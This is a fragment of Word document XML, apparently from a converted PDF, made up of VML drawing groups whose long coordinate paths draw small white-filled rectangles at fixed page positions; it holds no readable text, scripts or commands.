2800,10589,2800,10589,2800,10589,2800,10589,2800,10590,2800,10590,2800,10590,2800,10590,2800,10590,2800,10590,2800,10590,2800,10590,2800,10590,2800,10591,2800,10591,2800,10591,2800,10591,2800,10591,2800,10592,2800,10592,2800,10592,2800,10593,2800,10593,2800,10593,2800,10594,2800,10594,2800,10595,2800,10595,2800,10596,2800,10596,2800,10597,2800,10598,2800,10598,2800,10599,2800,10600,2800,10601,2800,10601,2800,10602,2800,10603,2800,10604,2800,10605,2800,10606,2800,10607,2800,10608,2800,10609,2800,10611,2800,10612,2800,10613,2800,10615,2800,10616,2800,10617,2800,10619,2800,10620,2800,10622,2800,10624,2800,10625,2800,10627,2800,10629,2800,10631,2800,10633,2800,10635,2800,10637,2800,10639,2800,10641,2800,10644,2800,10646,2800,10648,2800,10651,2800,10653,2800,10656,2800,10658,2800,10661,2800,10664,2800,10667,2800,10670,2800,10673,2800,10676,2800,10679,2800,10682,2800,10686,2800,10689,2800,10693,2800,10696,2800,10700,2800,10703,2800,10707,2800,10711,2800,10715,2800,10719,2800,10723,2800,10728,2800,10732,2800,10736,2800,10741,2800,10745,2800,10750,2800,10755,2800,10760,2800,10765,2800,10770,2800,10775,2800,10780,2800,10785,2800,10791,2800,10796,2800,10802,2800,10808,2800,10814,2800,10820,2800,10826,2800,10832,2800,10838,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2800,10844,2799,10844,2799,10844,2799,10844,2799,10844,2799,10844,2799,10844,2798,10844,2798,10844,2798,10844,2798,10844,2798,10844,2797,10844,2797,10844,2797,10844,2797,10844,2796,10844,2796,10844,2795,10844,2795,10844,2795,10844,2794,10844,2794,10844,2793,10844,2793,10844,2793,10844,2792,10844,2792,10844,2791,10844,2790,10844,2790,10844,2789,10844,2789,10844,2788,10844,2787,10844,2787,10844,2786,10844,2785,10844,2784,10844,2783,10844,2783,10844,2782,10844,2781,10844,2780,10844,2779,10844,2778,10844,2777,10844,2776,10844,2775,10844,2774,10844,2773,10844,2772,10844,2770,10844,2769,10844,2768,10844,2767,10844,2765,10844,2764,10844,2763,10844,2761,10844,2760,10844,2758,10844,2757,10844,2755,10844,2753,10844,2752,10844,2750,10844,2748,10844,2747,10844,2745,10844,2743,10844,2741,10844,2739,10844,2737,10844,2735,10844,2733,10844,2731,10844,2729,10844,2727,10844,2725,10844,2723,10844,2720,10844,2718,10844,2716,10844,2713,10844,2711,10844,2708,10844,2706,10844,2703,10844,2700,10844,2698,10844,2695,10844,2692,10844,2689,10844,2686,10844,2683,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10844,2680,10843,2680,10843,2680,10843,2680,10843,2680,10843,2680,10842,2680,10842,2680,10842,2680,10841,2680,10841,2680,10841,2680,10840,2680,10840,2680,10840,2680,10839,2680,10839,2680,10838,2680,10837,2680,10837,2680,10836,2680,10835,2680,10835,2680,10834,2680,10833,2680,10832,2680,10832,2680,10831,2680,10830,2680,10829,2680,10828,2680,10827,2680,10826,2680,10824,2680,10823,2680,10822,2680,10821,2680,10819,2680,10818,2680,10816,2680,10815,2680,10813,2680,10812,2680,10810,2680,10808,2680,10807,2680,10805,2680,10803,2680,10801,2680,10799,2680,10797,2680,10795,2680,10793,2680,10790,2680,10788,2680,10786,2680,10783,2680,10781,2680,10778,2680,10775,2680,10773,2680,10770,2680,10767,2680,10764,2680,10761,2680,10758,2680,10755,2680,10751,2680,10748,2680,10745,2680,10741,2680,10738,2680,10734,2680,10730,2680,10727,2680,10723,2680,10719,2680,10715,2680,10711,2680,10706,2680,10702,2680,10698,2680,10693,2680,10688,2680,10684,2680,10679,2680,10674,2680,10669,2680,10664,2680,10659,2680,10654,2680,10648,2680,10643,2680,10637,2680,10632,2680,10626,2680,10620,2680,10614,2680,10608,2680,10602,2680,10596,2680,10589e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:560.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,11210" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:11210;width:130;height:250" coordorigin="2670,11210" coordsize="130,250" path="m2680,11220l2680,11220,2680,11220,2680,11220,2680,11220,2680,11220,2680,11220,2680,11220,2680,11220,2680,11220,2680,11220,2680,11220,2680,11220,2680,11220,2681,11220,2681,11220,2681,11220,2681,11220,2681,11220,2681,11220,2681,11220,2681,11220,2681,11220,2681,11220,2681,11220,2681,11220,2681,11220,2682,11220,2682,11220,2682,11220,2682,11220,2682,11220,2682,11220,2683,11220,2683,11220,2683,11220,2683,11220,2684,11220,2684,11220,2684,11220,2685,11220,2685,11220,2685,11220,2686,11220,2686,11220,2686,11220,2687,11220,2687,11220,2688,11220,2688,11220,2689,11220,2689,11220,2690,11220,2690,11220,2691,11220,2692,11220,2692,11220,2693,11220,2694,11220,2694,11220,2695,11220,2696,11220,2697,11220,2697,11220,2698,11220,2699,11220,2700,11220,2701,11220,2702,11220,2703,11220,2704,11220,2705,11220,2706,11220,2707,11220,2708,11220,2709,11220,2710,11220,2712,11220,2713,11220,2714,11220,2715,11220,2717,11220,2718,11220,2720,11220,2721,11220,2723,11220,2724,11220,2726,11220,2727,11220,2729,11220,2731,11220,2732,11220,2734,11220,2736,11220,2738,11220,2740,11220,2741,11220,2743,11220,2745,11220,2747,11220,2749,11220,2752,11220,2754,11220,2756,11220,2758,11220,2760,11220,2763,11220,2765,11220,2768,11220,2770,11220,2773,11220,2775,11220,2778,11220,2780,11220,2783,11220,2786,11220,2789,11220,2792,11220,2794,11220,2797,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11220,2800,11221,2800,11221,2800,11221,2800,11221,2800,11221,2800,11221,2800,11222,2800,11222,2800,11222,2800,11223,2800,11223,2800,11223,2800,11224,2800,11224,2800,11225,2800,11225,2800,11226,2800,11226,2800,11227,2800,11227,2800,11228,2800,11229,2800,11229,2800,11230,2800,11231,2800,11232,2800,11233,2800,11233,2800,11234,2800,11235,2800,11236,2800,11237,2800,11239,2800,11240,2800,11241,2800,11242,2800,11243,2800,11245,2800,11246,2800,11248,2800,11249,2800,11251,2800,11252,2800,11254,2800,11256,2800,11258,2800,11259,2800,11261,2800,11263,2800,11265,2800,11267,2800,11269,2800,11272,2800,11274,2800,11276,2800,11279,2800,11281,2800,11284,2800,11286,2800,11289,2800,11291,2800,11294,2800,11297,2800,11300,2800,11303,2800,11306,2800,11309,2800,11313,2800,11316,2800,11319,2800,11323,2800,11326,2800,11330,2800,11334,2800,11338,2800,11341,2800,11345,2800,11349,2800,11354,2800,11358,2800,11362,2800,11367,2800,11371,2800,11376,2800,11380,2800,11385,2800,11390,2800,11395,2800,11400,2800,11405,2800,11410,2800,11416,2800,11421,2800,11427,2800,11432,2800,11438,2800,11444,2800,11450,2800,11456,2800,11462,2800,11468,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2800,11475,2799,11475,2799,11475,2799,11475,2799,11475,2799,11475,2799,11475,2798,11475,2798,11475,2798,11475,2798,11475,2798,11475,2797,11475,2797,11475,2797,11475,2797,11475,2796,11475,2796,11475,2795,11475,2795,11475,2795,11475,2794,11475,2794,11475,2793,11475,2793,11475,2793,11475,2792,11475,2792,11475,2791,11475,2790,11475,2790,11475,2789,11475,2789,11475,2788,11475,2787,11475,2787,11475,2786,11475,2785,11475,2784,11475,2783,11475,2783,11475,2782,11475,2781,11475,2780,11475,2779,11475,2778,11475,2777,11475,2776,11475,2775,11475,2774,11475,2773,11475,2772,11475,2770,11475,2769,11475,2768,11475,2767,11475,2765,11475,2764,11475,2763,11475,2761,11475,2760,11475,2758,11475,2757,11475,2755,11475,2753,11475,2752,11475,2750,11475,2748,11475,2747,11475,2745,11475,2743,11475,2741,11475,2739,11475,2737,11475,2735,11475,2733,11475,2731,11475,2729,11475,2727,11475,2725,11475,2723,11475,2720,11475,2718,11475,2716,11475,2713,11475,2711,11475,2708,11475,2706,11475,2703,11475,2700,11475,2698,11475,2695,11475,2692,11475,2689,11475,2686,11475,2683,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11475,2680,11474,2680,11474,2680,11474,2680,11474,2680,11474,2680,11474,2680,11474,2680,11474,2680,11473,2680,11473,2680,11473,2680,11473,2680,11472,2680,11472,2680,11472,2680,11471,2680,11471,2680,11471,2680,11470,2680,11470,2680,11469,2680,11469,2680,11468,2680,11468,2680,11467,2680,11466,2680,11466,2680,11465,2680,11464,2680,11464,2680,11463,2680,11462,2680,11461,2680,11460,2680,11459,2680,11458,2680,11457,2680,11456,2680,11455,2680,11453,2680,11452,2680,11451,2680,11450,2680,11448,2680,11447,2680,11445,2680,11444,2680,11442,2680,11440,2680,11439,2680,11437,2680,11435,2680,11433,2680,11431,2680,11429,2680,11427,2680,11425,2680,11423,2680,11421,2680,11418,2680,11416,2680,11413,2680,11411,2680,11408,2680,11406,2680,11403,2680,11400,2680,11397,2680,11394,2680,11391,2680,11388,2680,11385,2680,11382,2680,11378,2680,11375,2680,11372,2680,11368,2680,11364,2680,11361,2680,11357,2680,11353,2680,11349,2680,11345,2680,11341,2680,11337,2680,11332,2680,11328,2680,11323,2680,11319,2680,11314,2680,11309,2680,11304,2680,11300,2680,11294,2680,11289,2680,11284,2680,11279,2680,11273,2680,11268,2680,11262,2680,11256,2680,11250,2680,11245,2680,11238,2680,11232,2680,11226,2680,11220e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:592.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,11850" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:11850;width:130;height:270" coordorigin="2670,11850" coordsize="130,270" path="m2680,11865l2680,11865,2680,11865,2680,11865,2680,11865,2680,11865,2680,11865,2680,11865,2680,11865,2680,11865,2680,11865,2680,11865,2680,11865,2680,11865,2681,11865,2681,11865,2681,11865,2681,11865,2681,11865,2681,11865,2681,11865,2681,11865,2681,11865,2681,11865,2681,11865,2681,11865,2681,11865,2682,11865,2682,11865,2682,11865,2682,11865,2682,11865,2682,11865,2683,11865,2683,11865,2683,11865,2683,11865,2684,11865,2684,11865,2684,11865,2685,11865,2685,11865,2685,11865,2686,11865,2686,11865,2686,11865,2687,11865,2687,11865,2688,11865,2688,11865,2689,11865,2689,11865,2690,11865,2690,11865,2691,11865,2692,11865,2692,11865,2693,11865,2694,11865,2694,11865,2695,11865,2696,11865,2697,11865,2697,11865,2698,11865,2699,11865,2700,11865,2701,11865,2702,11865,2703,11865,2704,11865,2705,11865,2706,11865,2707,11865,2708,11865,2709,11865,2710,11865,2712,11865,2713,11865,2714,11865,2715,11865,2717,11865,2718,11865,2720,11865,2721,11865,2723,11865,2724,11865,2726,11865,2727,11865,2729,11865,2731,11865,2732,11865,2734,11865,2736,11865,2738,11865,2740,11865,2741,11865,2743,11865,2745,11865,2747,11865,2749,11865,2752,11865,2754,11865,2756,11865,2758,11865,2760,11865,2763,11865,2765,11865,2768,11865,2770,11865,2773,11865,2775,11865,2778,11865,2780,11865,2783,11865,2786,11865,2789,11865,2792,11865,2794,11865,2797,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11865,2800,11866,2800,11866,2800,11866,2800,11866,2800,11866,2800,11866,2800,11867,2800,11867,2800,11867,2800,11867,2800,11868,2800,11868,2800,11868,2800,11869,2800,11869,2800,11869,2800,11870,2800,11870,2800,11871,2800,11871,2800,11872,2800,11873,2800,11873,2800,11874,2800,11875,2800,11875,2800,11876,2800,11877,2800,11878,2800,11879,2800,11880,2800,11881,2800,11882,2800,11883,2800,11884,2800,11885,2800,11886,2800,11888,2800,11889,2800,11890,2800,11892,2800,11893,2800,11895,2800,11896,2800,11898,2800,11899,2800,11901,2800,11903,2800,11905,2800,11907,2800,11909,2800,11911,2800,11913,2800,11915,2800,11917,2800,11919,2800,11921,2800,11924,2800,11926,2800,11929,2800,11931,2800,11934,2800,11937,2800,11940,2800,11942,2800,11945,2800,11948,2800,11952,2800,11955,2800,11958,2800,11961,2800,11965,2800,11968,2800,11972,2800,11975,2800,11979,2800,11983,2800,11987,2800,11991,2800,11995,2800,11999,2800,12003,2800,12007,2800,12012,2800,12016,2800,12021,2800,12026,2800,12030,2800,12035,2800,12040,2800,12045,2800,12050,2800,12056,2800,12061,2800,12066,2800,12072,2800,12078,2800,12083,2800,12089,2800,12095,2800,12101,2800,12107,2800,12114,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2800,12120,2799,12120,2799,12120,2799,12120,2799,12120,2799,12120,2799,12120,2798,12120,2798,12120,2798,12120,2798,12120,2798,12120,2797,12120,2797,12120,2797,12120,2797,12120,2796,12120,2796,12120,2795,12120,2795,12120,2795,12120,2794,12120,2794,12120,2793,12120,2793,12120,2793,12120,2792,12120,2792,12120,2791,12120,2790,12120,2790,12120,2789,12120,2789,12120,2788,12120,2787,12120,2787,12120,2786,12120,2785,12120,2784,12120,2783,12120,2783,12120,2782,12120,2781,12120,2780,12120,2779,12120,2778,12120,2777,12120,2776,12120,2775,12120,2774,12120,2773,12120,2772,12120,2770,12120,2769,12120,2768,12120,2767,12120,2765,12120,2764,12120,2763,12120,2761,12120,2760,12120,2758,12120,2757,12120,2755,12120,2753,12120,2752,12120,2750,12120,2748,12120,2747,12120,2745,12120,2743,12120,2741,12120,2739,12120,2737,12120,2735,12120,2733,12120,2731,12120,2729,12120,2727,12120,2725,12120,2723,12120,2720,12120,2718,12120,2716,12120,2713,12120,2711,12120,2708,12120,2706,12120,2703,12120,2700,12120,2698,12120,2695,12120,2692,12120,2689,12120,2686,12120,2683,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12120,2680,12119,2680,12119,2680,12119,2680,12119,2680,12119,2680,12119,2680,12118,2680,12118,2680,12118,2680,12118,2680,12117,2680,12117,2680,12117,2680,12116,2680,12116,2680,12116,2680,12115,2680,12115,2680,12114,2680,12114,2680,12113,2680,12112,2680,12112,2680,12111,2680,12110,2680,12110,2680,12109,2680,12108,2680,12107,2680,12106,2680,12105,2680,12104,2680,12103,2680,12102,2680,12101,2680,12100,2680,12099,2680,12098,2680,12096,2680,12095,2680,12094,2680,12092,2680,12091,2680,12089,2680,12087,2680,12086,2680,12084,2680,12082,2680,12080,2680,12079,2680,12077,2680,12075,2680,12072,2680,12070,2680,12068,2680,12066,2680,12064,2680,12061,2680,12059,2680,12056,2680,12054,2680,12051,2680,12048,2680,12045,2680,12043,2680,12040,2680,12037,2680,12034,2680,12030,2680,12027,2680,12024,2680,12020,2680,12017,2680,12013,2680,12010,2680,12006,2680,12002,2680,11998,2680,11994,2680,11990,2680,11986,2680,11982,2680,11978,2680,11973,2680,11969,2680,11964,2680,11959,2680,11955,2680,11950,2680,11945,2680,11940,2680,11935,2680,11929,2680,11924,2680,11919,2680,11913,2680,11907,2680,11902,2680,11896,2680,11890,2680,11884,2680,11878,2680,11871,2680,11865e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:623.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,12470" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:12470;width:130;height:270" coordorigin="2670,12470" coordsize="130,270" path="m2680,12495l2680,12495,2680,12495,2680,12495,2680,12495,2680,12495,2680,12495,2680,12495,2680,12495,2680,12495,2680,12495,2680,12495,2680,12495,2680,12495,2681,12495,2681,12495,2681,12495,2681,12495,2681,12495,2681,12495,2681,12495,2681,12495,2681,12495,2681,12495,2681,12495,2681,12495,2681,12495,2682,12495,2682,12495,2682,12495,2682,12495,2682,12495,2682,12495,2683,12495,2683,12495,2683,12495,2683,12495,2684,12495,2684,12495,2684,12495,2685,12495,2685,12495,2685,12495,2686,12495,2686,12495,2686,12495,2687,12495,2687,12495,2688,12495,2688,12495,2689,12495,2689,12495,2690,12495,2690,12495,2691,12495,2692,12495,2692,12495,2693,12495,2694,12495,2694,12495,2695,12495,2696,12495,2697,12495,2697,12495,2698,12495,2699,12495,2700,12495,2701,12495,2702,12495,2703,12495,2704,12495,2705,12495,2706,12495,2707,12495,2708,12495,2709,12495,2710,12495,2712,12495,2713,12495,2714,12495,2715,12495,2717,12495,2718,12495,2720,12495,2721,12495,2723,12495,2724,12495,2726,12495,2727,12495,2729,12495,2731,12495,2732,12495,2734,12495,2736,12495,2738,12495,2740,12495,2741,12495,2743,12495,2745,12495,2747,12495,2749,12495,2752,12495,2754,12495,2756,12495,2758,12495,2760,12495,2763,12495,2765,12495,2768,12495,2770,12495,2773,12495,2775,12495,2778,12495,2780,12495,2783,12495,2786,12495,2789,12495,2792,12495,2794,12495,2797,12495,2800,12495,2800,12495,2800,12495,2800,12495,2800,12495,2800,12495,2800,12495,2800,12495,2800,12495,2800,12495,2800,12495,2800,12495,2800,12495,2800,12496,2800,12496,2800,12496,2800,12496,2800,12496,2800,12496,2800,12496,2800,12496,2800,12497,2800,12497,2800,12497,2800,12497,2800,12497,2800,12498,2800,12498,2800,12498,2800,12499,2800,12499,2800,12499,2800,12500,2800,12500,2800,12501,2800,12501,2800,12502,2800,12502,2800,12503,2800,12504,2800,12504,2800,12505,2800,12506,2800,12507,2800,12507,2800,12508,2800,12509,2800,12510,2800,12511,2800,12512,2800,12513,2800,12514,2800,12515,2800,12517,2800,12518,2800,12519,2800,12520,2800,12522,2800,12523,2800,12525,2800,12526,2800,12528,2800,12530,2800,12531,2800,12533,2800,12535,2800,12537,2800,12539,2800,12541,2800,12543,2800,12545,2800,12547,2800,12549,2800,12552,2800,12554,2800,12557,2800,12559,2800,12562,2800,12564,2800,12567,2800,12570,2800,12573,2800,12576,2800,12579,2800,12582,2800,12585,2800,12588,2800,12592,2800,12595,2800,12598,2800,12602,2800,12606,2800,12609,2800,12613,2800,12617,2800,12621,2800,12625,2800,12629,2800,12633,2800,12638,2800,12642,2800,12647,2800,12651,2800,12656,2800,12661,2800,12666,2800,12671,2800,12676,2800,12681,2800,12686,2800,12691,2800,12697,2800,12702,2800,12708,2800,12714,2800,12720,2800,12726,2800,12732,2800,12738,2800,12744,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2800,12750,2799,12750,2799,12750,2799,12750,2799,12750,2799,12750,2799,12750,2798,12750,2798,12750,2798,12750,2798,12750,2798,12750,2797,12750,2797,12750,2797,12750,2797,12750,2796,12750,2796,12750,2795,12750,2795,12750,2795,12750,2794,12750,2794,12750,2793,12750,2793,12750,2793,12750,2792,12750,2792,12750,2791,12750,2790,12750,2790,12750,2789,12750,2789,12750,2788,12750,2787,12750,2787,12750,2786,12750,2785,12750,2784,12750,2783,12750,2783,12750,2782,12750,2781,12750,2780,12750,2779,12750,2778,12750,2777,12750,2776,12750,2775,12750,2774,12750,2773,12750,2772,12750,2770,12750,2769,12750,2768,12750,2767,12750,2765,12750,2764,12750,2763,12750,2761,12750,2760,12750,2758,12750,2757,12750,2755,12750,2753,12750,2752,12750,2750,12750,2748,12750,2747,12750,2745,12750,2743,12750,2741,12750,2739,12750,2737,12750,2735,12750,2733,12750,2731,12750,2729,12750,2727,12750,2725,12750,2723,12750,2720,12750,2718,12750,2716,12750,2713,12750,2711,12750,2708,12750,2706,12750,2703,12750,2700,12750,2698,12750,2695,12750,2692,12750,2689,12750,2686,12750,2683,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12750,2680,12749,2680,12749,2680,12749,2680,12749,2680,12749,2680,12748,2680,12748,2680,12748,2680,12747,2680,12747,2680,12747,2680,12746,2680,12746,2680,12745,2680,12745,2680,12744,2680,12744,2680,12743,2680,12743,2680,12742,2680,12741,2680,12741,2680,12740,2680,12739,2680,12738,2680,12738,2680,12737,2680,12736,2680,12735,2680,12734,2680,12733,2680,12731,2680,12730,2680,12729,2680,12728,2680,12727,2680,12725,2680,12724,2680,12722,2680,12721,2680,12719,2680,12718,2680,12716,2680,12714,2680,12713,2680,12711,2680,12709,2680,12707,2680,12705,2680,12703,2680,12701,2680,12698,2680,12696,2680,12694,2680,12692,2680,12689,2680,12687,2680,12684,2680,12681,2680,12679,2680,12676,2680,12673,2680,12670,2680,12667,2680,12664,2680,12661,2680,12657,2680,12654,2680,12651,2680,12647,2680,12644,2680,12640,2680,12636,2680,12633,2680,12629,2680,12625,2680,12621,2680,12616,2680,12612,2680,12608,2680,12604,2680,12599,2680,12594,2680,12590,2680,12585,2680,12580,2680,12575,2680,12570,2680,12565,2680,12560,2680,12554,2680,12549,2680,12543,2680,12538,2680,12532,2680,12526,2680,12520,2680,12514,2680,12508,2680,12502,2680,12495e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:656.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,13130" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:13130;width:130;height:250" coordorigin="2670,13130" coordsize="130,250" path="m2680,13141l2680,13141,2680,13141,2680,13141,2680,13141,2680,13141,2680,13141,2680,13141,2680,13141,2680,13141,2680,13141,2680,13141,2680,13141,2680,13141,2681,13141,2681,13141,2681,13141,2681,13141,2681,13141,2681,13141,2681,13141,2681,13141,2681,13141,2681,13141,2681,13141,2681,13141,2681,13141,2682,13141,2682,13141,2682,13141,2682,13141,2682,13141,2682,13141,2683,13141,2683,13141,2683,13141,2683,13141,2684,13141,2684,13141,2684,13141,2685,13141,2685,13141,2685,13141,2686,13141,2686,13141,2686,13141,2687,13141,2687,13141,2688,13141,2688,13141,2689,13141,2689,13141,2690,13141,2690,13141,2691,13141,2692,13141,2692,13141,2693,13141,2694,13141,2694,13141,2695,13141,2696,13141,2697,13141,2697,13141,2698,13141,2699,13141,2700,13141,2701,13141,2702,13141,2703,13141,2704,13141,2705,13141,2706,13141,2707,13141,2708,13141,2709,13141,2710,13141,2712,13141,2713,13141,2714,13141,2715,13141,2717,13141,2718,13141,2720,13141,2721,13141,2723,13141,2724,13141,2726,13141,2727,13141,2729,13141,2731,13141,2732,13141,2734,13141,2736,13141,2738,13141,2740,13141,2741,13141,2743,13141,2745,13141,2747,13141,2749,13141,2752,13141,2754,13141,2756,13141,2758,13141,2760,13141,2763,13141,2765,13141,2768,13141,2770,13141,2773,13141,2775,13141,2778,13141,2780,13141,2783,13141,2786,13141,2789,13141,2792,13141,2794,13141,2797,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13141,2800,13142,2800,13142,2800,13142,2800,13142,2800,13142,2800,13142,2800,13143,2800,13143,2800,13143,2800,13144,2800,13144,2800,13144,2800,13145,2800,13145,2800,13146,2800,13146,2800,13147,2800,13147,2800,13148,2800,13148,2800,13149,2800,13150,2800,13150,2800,13151,2800,13152,2800,13153,2800,13154,2800,13154,2800,13155,2800,13156,2800,13157,2800,13158,2800,13160,2800,13161,2800,13162,2800,13163,2800,13164,2800,13166,2800,13167,2800,13169,2800,13170,2800,13172,2800,13173,2800,13175,2800,13177,2800,13178,2800,13180,2800,13182,2800,13184,2800,13186,2800,13188,2800,13190,2800,13193,2800,13195,2800,13197,2800,13200,2800,13202,2800,13204,2800,13207,2800,13210,2800,13212,2800,13215,2800,13218,2800,13221,2800,13224,2800,13227,2800,13230,2800,13234,2800,13237,2800,13240,2800,13244,2800,13247,2800,13251,2800,13255,2800,13259,2800,13262,2800,13266,2800,13270,2800,13275,2800,13279,2800,13283,2800,13288,2800,13292,2800,13297,2800,13301,2800,13306,2800,13311,2800,13316,2800,13321,2800,13326,2800,13331,2800,13337,2800,13342,2800,13348,2800,13353,2800,13359,2800,13365,2800,13371,2800,13377,2800,13383,2800,13389,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2800,13396,2799,13396,2799,13396,2799,13396,2799,13396,2799,13396,2799,13396,2798,13396,2798,13396,2798,13396,2798,13396,2798,13396,2797,13396,2797,13396,2797,13396,2797,13396,2796,13396,2796,13396,2795,13396,2795,13396,2795,13396,2794,13396,2794,13396,2793,13396,2793,13396,2793,13396,2792,13396,2792,13396,2791,13396,2790,13396,2790,13396,2789,13396,2789,13396,2788,13396,2787,13396,2787,13396,2786,13396,2785,13396,2784,13396,2783,13396,2783,13396,2782,13396,2781,13396,2780,13396,2779,13396,2778,13396,2777,13396,2776,13396,2775,13396,2774,13396,2773,13396,2772,13396,2770,13396,2769,13396,2768,13396,2767,13396,2765,13396,2764,13396,2763,13396,2761,13396,2760,13396,2758,13396,2757,13396,2755,13396,2753,13396,2752,13396,2750,13396,2748,13396,2747,13396,2745,13396,2743,13396,2741,13396,2739,13396,2737,13396,2735,13396,2733,13396,2731,13396,2729,13396,2727,13396,2725,13396,2723,13396,2720,13396,2718,13396,2716,13396,2713,13396,2711,13396,2708,13396,2706,13396,2703,13396,2700,13396,2698,13396,2695,13396,2692,13396,2689,13396,2686,13396,2683,13396,2680,13396,2680,13396,2680,13396,2680,13396,2680,13396,2680,13396,2680,13396,2680,13396,2680,13396,2680,13396,2680,13396,2680,13396,2680,13396,2680,13395,2680,13395,2680,13395,2680,13395,2680,13395,2680,13395,2680,13395,2680,13395,2680,13395,2680,13394,2680,13394,2680,13394,2680,13394,2680,13393,2680,13393,2680,13393,2680,13392,2680,13392,2680,13392,2680,13391,2680,13391,2680,13390,2680,13390,2680,13389,2680,13389,2680,13388,2680,13387,2680,13387,2680,13386,2680,13385,2680,13385,2680,13384,2680,13383,2680,13382,2680,13381,2680,13380,2680,13379,2680,13378,2680,13377,2680,13376,2680,13374,2680,13373,2680,13372,2680,13371,2680,13369,2680,13368,2680,13366,2680,13365,2680,13363,2680,13361,2680,13360,2680,13358,2680,13356,2680,13354,2680,13352,2680,13350,2680,13348,2680,13346,2680,13344,2680,13342,2680,13339,2680,13337,2680,13334,2680,13332,2680,13329,2680,13327,2680,13324,2680,13321,2680,13318,2680,13315,2680,13312,2680,13309,2680,13306,2680,13303,2680,13299,2680,13296,2680,13293,2680,13289,2680,13285,2680,13282,2680,13278,2680,13274,2680,13270,2680,13266,2680,13262,2680,13258,2680,13253,2680,13249,2680,13244,2680,13240,2680,13235,2680,13230,2680,13225,2680,13220,2680,13215,2680,13210,2680,13205,2680,13200,2680,13194,2680,13189,2680,13183,2680,13177,2680,13171,2680,13165,2680,13159,2680,13153,2680,13147,2680,13141e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:687.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,13750" coordsize="130,270">
